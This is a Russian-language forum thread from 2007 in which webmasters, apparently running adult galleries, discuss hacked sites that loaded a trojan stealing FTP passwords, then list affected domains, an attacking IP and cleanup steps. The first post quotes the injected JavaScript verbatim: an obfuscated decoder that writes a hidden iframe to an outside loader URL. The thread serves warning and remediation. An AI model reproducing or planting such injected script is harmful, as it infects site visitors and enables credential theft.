Old Oil Barrel
С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265
|
Добавлено: 27/03/07 в 19:09 |
С фрихов при загрузке выполняется Джава код грузит троян, который ворует пароли от ФТП
http://www.momsforyou.com/xxx/latina-milf/mom-mature/
http://www.lesbiansplanet.com/girls/perfect-smooth-bodies/lesbian-ass/
Цитата: | <!-- ~ --><SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!
109!101!32!115!114!99!61!
34!104!116!116!112!58!47!47!
115!115!115!55!46!105!110!102!111!47!
116!100!115!47!105!110!46!99!103!105!63!50!
34!32!119!105!100!116!104!61!34!49!34!32!104!101
!105!103!104!116!61!34!49!34!62!60!47!105!102!
114!97!109!101!62!";l=str.length;while(c<=str.length-1)
{while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;
out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT> |
Без гандонов не входить, некоторые долго потом комп чистили, антивири его не видят
Владелец этого домена или не видит или мудак редкостный так как продолжает постить
Есть возможно еще фрихи
Последний раз редактировалось: Sergeyka (28/03/07 в 10:18), всего редактировалось 3 раз(а)
|
|
|
|
С нами с 14.04.04
Сообщения: 1657
Рейтинг: 402
|
Добавлено: 27/03/07 в 19:25 |
Sergeyka: еще вот эти два домена:
see-her-squirt.biz
beautylatinas.com
у меня улетели седня в бан
|
|
|
|
Old Oil Barrel
С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265
|
Добавлено: 27/03/07 в 19:26 |
Вика спасибо, народ как лечить этого пидара не видят антивири его
Где сидит процесс что запускает файлы?
Файлы находяться в корне диска с
|
|
|
|
Деньги из воздуха...
С нами с 26.09.04
Сообщения: 3797
Рейтинг: 2283
|
Добавлено: 27/03/07 в 19:33 |
|
|
|
|
Old Oil Barrel
С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265
|
Добавлено: 27/03/07 в 19:36 |
когда вы пофиксили, сходи по линке
Блин, еще бы научили как лечиться теперь?
|
|
|
|
Old Oil Barrel
С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265
|
Добавлено: 27/03/07 в 19:57 |
забавно сука эта хуета сама себя прописала в брэндмауэр виндоса типа разрешено с него урлы отправлять, вроде убил но не уверен, не нашел где сидит эта сука
|
|
|
|
Деньги из воздуха...
С нами с 26.09.04
Сообщения: 3797
Рейтинг: 2283
|
Добавлено: 27/03/07 в 20:50 |
hotsianbabes.com
lesbiansplanet.com
С этими доменами ситуация следующая.
Юзерами не были созданы бекапы, потому можно домены из листинга удалить, содержимое удаляется в данный момент под чистую, разбираться мне лень. Пароли сменены.
Овнерам
Ребята, приносим свои извинения, данная хрень почти сразу была обнаружена, мы бросили все и оперативно востановили все что смогли, не смотря на накрытый стол и ДР одного из коллег . В данный момент админы проверяют все что можно. Что вызывает подозрения сносим нафиг.
Банить постеров или не банить дело Ваше...
Спасибо за понимание, всю инфу буду постить по мере ее поступления.
Еще раз приношу свои извинения.
|
|
|
|
full-plastic programmist
С нами с 05.09.03
Сообщения: 8361
Рейтинг: 4779
|
Добавлено: 27/03/07 в 21:08 |
|
|
вот соскучился по мастеру...
|
8
|
|
|
Деньги из воздуха...
С нами с 26.09.04
Сообщения: 3797
Рейтинг: 2283
|
Добавлено: 27/03/07 в 21:11 |
|
|
|
|
С нами с 07.10.03
Сообщения: 5194
Рейтинг: 3325
|
Добавлено: 27/03/07 в 21:14 |
да блин со многих сайтов грузится экзешник, дрочам думаю пофиг , они не заметят но что он делает на компе при автозапуске х.е.з
|
|
|
|
С нами с 06.03.05
Сообщения: 6216
Рейтинг: 7375
|
Добавлено: 27/03/07 в 22:10 |
сенкс за инфу, так что теперь с этими доменами делать? сносить их из бд?
|
|
|
|
С нами с 18.04.05
Сообщения: 3728
Рейтинг: 4605
|
Добавлено: 27/03/07 в 22:11 |
Ну так теперь всё нормально или как?
|
|
|
|
Деньги из воздуха...
С нами с 26.09.04
Сообщения: 3797
Рейтинг: 2283
|
Добавлено: 27/03/07 в 22:28 |
В данный момент удален контент полностью с доменов
hotsianbabes.com
lesbiansplanet.com
так как там не было сделано юзерами бекапов.
На всех остальных серверах все восстановлено из бекапов и в данный момент вообще выключен доступ по ФТП для всех пользователей от греха подальше. До момента выяснения каким образом ушли пароли я его открывать не буду никому .
Такая ситуация не у нас одних, всем нашим партнерам я стукнул в аську и уведомил о ситуации. Кто не получил мессагу из наших партнеров стучите мне я дам все разъяснения.
|
|
|
|
С нами с 02.07.04
Сообщения: 495
Рейтинг: 345
|
Добавлено: 27/03/07 в 22:38 |
У меня тоже эта хрень, прошу овнеров не выкидывать из базы фрихи с доменов:
_sugaryteen.com/
_enamoure.com/
_wetoasis.com/
_exoticwish.com/
_exoticsea.com/
_ethnicisle.com/
_ethnic-hotel.com/
_ethnicangel.com/
_exoticflame.com/
_myethnicgirls.com/
_exotic-land.com/
_honeyfree.com/
_wetforest.com/
Сейчас разбираемся.
Последний раз редактировалось: eger (30/03/07 в 13:36), всего редактировалось 1 раз
|
|
|
|
С нами с 06.03.05
Сообщения: 6216
Рейтинг: 7375
|
Добавлено: 27/03/07 в 22:41 |
а в чем уязвимость не определили еще? если тока html то нет опасений?
|
|
|
|
Деньги из воздуха...
С нами с 26.09.04
Сообщения: 3797
Рейтинг: 2283
|
Добавлено: 27/03/07 в 22:46 |
Дело не в серверах, дело в троянах на локале. Какие трояны угнали пароли пока выясняем. Вот я отписал
Взлом с 75.126.21.163
eger бро, удачно тебе восстановить все.
|
|
|
|
Раздаю инвайты, ищу линк-трейд
С нами с 20.08.04
Сообщения: 16668
Рейтинг: 8593
|
Добавлено: 27/03/07 в 22:55 |
Те, кто фрихи проверял - проверьте свои хосты (индексные файлы)
|
|
|
|
XXX-Server.biz
С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676
|
Добавлено: 27/03/07 в 22:59 |
кто-нибудь - если удастся вытащить вирь, отошлите производетелям антивирей.... а то чувствую это надолго все...
|
|
|
|
С нами с 07.10.03
Сообщения: 5194
Рейтинг: 3325
|
Добавлено: 27/03/07 в 23:10 |
pierx писал: | Те, кто фрихи проверял - проверьте свои хосты (индексные файлы) |
а что там должно быть ?
лучше проверьте C:/ , там файлы типа FKJGHT.exe
если фиревол не стоял значит ушла инфа о вас, каспер, нод сасут...
|
|
|
|
Деньги из воздуха...
С нами с 26.09.04
Сообщения: 3797
Рейтинг: 2283
|
Добавлено: 27/03/07 в 23:17 |
exe размером 24605 байт ищите. пока все кто писал такой размер говорят. Но это уже в результате взлома грузили, куда ушли пароли пока не ясно. Касперскому отправили файлы.
|
|
|
|
С нами с 10.12.03
Сообщения: 1615
Рейтинг: 870
|
Добавлено: 27/03/07 в 23:20 |
угу. тоже седня такой код на 1 фрихе видел
|
|
|
|
Раздаю инвайты, ищу линк-трейд
С нами с 20.08.04
Сообщения: 16668
Рейтинг: 8593
|
Добавлено: 27/03/07 в 23:22 |
Сергейка, покоцай код пробелами - читать невозможно
|
|
|
|
С нами с 07.10.03
Сообщения: 5194
Рейтинг: 3325
|
Добавлено: 27/03/07 в 23:26 |
ritor писал: | exe размером 24605 байт ищите. пока все кто писал такой размер говорят. Но это уже в результате взлома грузили, куда ушли пароли пока не ясно. Касперскому отправили файлы. |
а откуда пароли уходят и какие имено ?
|
|
|
|
Деньги из воздуха...
С нами с 26.09.04
Сообщения: 3797
Рейтинг: 2283
|
Добавлено: 27/03/07 в 23:38 |
sexogen писал: | а откуда пароли уходят и какие имено ? |
По моим данным и данных тех кто мне стучал в аську, ушли пароли к ФТП. Оффтопик: А скрипт с айпишника 75.126.21.163 ходил по доменам, ставил редирект, зачем то залил мне чужого файла, доров каких то. много перепутал. На все наши серчфиды тоже поставлен был редирект.
4 домена наших партнеров с 300К ТГП трафа и акками полностью на экспы редиректило ну и в таком духе, дедик с сиджами успели закрыть.
так вот по опросу почти все кто попал пароли хранили в клиентах ФТП. по наличию троянов щас все усиленно проверяются, но пока безрезультатно.
|
|
|
|
С нами с 07.10.03
Сообщения: 5194
Рейтинг: 3325
|
Добавлено: 27/03/07 в 23:41 |
так есть ведь разные клиенты FTP , какой софт вы юзали , как конектились ? или где хранились пароли
каким браузером пользовались, версия.
нет смысла менять пароль если не установлен путь проникновения, угонят к ебеням повторно
ЗЫ
короче надо покупать корманый компутар специально для паролей
и к никаким сетям его не подрубать
зыы
и ставим софт http://www.dfservice.com/site-monitor/index.html.ru.htm для мониторинга сайтоф
|
|
|
|